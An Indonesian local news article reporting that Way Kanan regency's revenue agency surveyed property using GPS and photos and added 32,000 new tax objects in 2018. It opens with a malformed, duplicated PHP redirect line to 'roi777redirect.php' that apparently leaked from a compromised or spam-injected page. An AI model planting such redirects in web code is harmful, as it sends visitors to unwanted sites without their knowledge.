header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Objek Pajak Baru Way kanan Tahun 2018 Capai 32.000 -
Objek Pajak Baru Way kanan Tahun 2018 Capai 32.000

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Dalam rangka program peningkatan Pendapatan Asli Daerah tahun 2018, Badan pendapatan Daerah Kabupaten Way Kanan melaksanakan pendataan Objek Pajak Bumi dan bangunan di 14 Kecamatan Yang ada di Kabupaten Way kanan.

Kepala Badan Pendapatan Daerah Way Kanan, Hendri Sahri Mengatakan bahwa pendataan objek pajak Kabupaten ini sudah selesai dilaksanakan Pada Bulan Mei 2018 lalu.

“Saat ini kita sedang melaksanakan kegiatan Entry data hasil pendataan Lapangan sekaligus cetak blanko objek Pajak,” Ujar Hendri Sahri Saat di konfirmasi awak media, Selasa (03/07).

Hendri memaparkan, Dari hasil pendataan yang telah dilaksanakan, saat ini sudah ada peningkatan sebanyak 32.000 objek pajak baru dimana sebelumnya pada tahun 2017 jumlah objek pajak hanya 200.000 an, sekarang sudah bertambah menjadi 232.000 objek pajak.

“Selain penambahan objek pajak baru kita juga melakukan penyesuain terhadap objek pajak yang sudah terdata,” Papar Hendri.

Penyesuaian tarif objek pajak menurut kadis dilakukan pada objek yang tadinya hanya tanah kosong sekarang sudah terisi bangunan, ataupun objek pajak yang tadinya ada bangunan semi permanen sudah berubah menjadi permanen.

“untuk objek seperti itu tentunya nilai objek pajak mengalami penyesuaian, meskipun nilai objek tanahnya tidak mengalami kenaikan hanya penambahan pajak bangunan saja,” Ujar nya lagi.

Ditambahkan nya pula, metode Pendataan dilakukan petugas yang berjumlah puluhan di dampingi oleh aparat kampung dengan mengunakan GPS dan kamera , sehingga di hasilkan objek pajak sesuai koordinat dan akan tampil gambar objek pajak di data.

“Tujuan dari kegitan ini agar tidak ada lagi kepemilikan ganda untuk objek pajak dan konsumen pajak yang akan minta dikurangi nilai pajak nya langsung di setujui karena titik koordinat dan objek pajak akan muncul di layar tagihan nantinya,” Tambahnya.

Sementara itu Camat Blambangan Umpu Yustian Umri Sangon menyambut baik program pendataan objek pajak yang juga dilaksanakan di kecamatan Blambangan Umpu.

“diharapkan objek pajak di Blambangan umpu ada dalam titik kordinat beserta gambar objek pajak nya jelas terlihat.
Diharapkan juga akan adanya tambah nilai objek pajak yang akan diterima Pemda Way Kanan untuk pembangunan kedepan,” harap Yustian .

Terpisah Kepala kampung Negeri Baru Kecamatan Blambangan Umpu Arizal juga membenarkan bahwa seluruh Dusun dan RT di wilayahnya telah di data oleh petugas dari Badan Pendapatan Daerah Kabupaten Way Kanan yang di dampingi oleh RT Masing-masing.

Arizal menyebutkan bahwa kegiatan pendataan ini dilkukan dari bawah betul, setiap objek pajak yang ada di data memakai GPS dan di fhoto langsung oleh petugas.

Senada Kepala kampung Bumi Baru Chandra Kurniawanjuga membenarkan ada petugas yng mendata objek pajak dari rumah kerumah yng di damping oleh petugas Kampung.

Chandra juga mengucpkan banyak terima kasih telah didata objek pajak di kampungnya sehingga tidak ada lagi objek pajak yg ganda kepemilikannya .

“Sangking antusiasnya warga, bahkan mereka yang langsung mendatangi petugas Dan minta di masukan dalam data objek pajak,” Ujar Kakam Chandra Kurniawan. (Migo)

News Reporter
Kepala Biro di Waykanan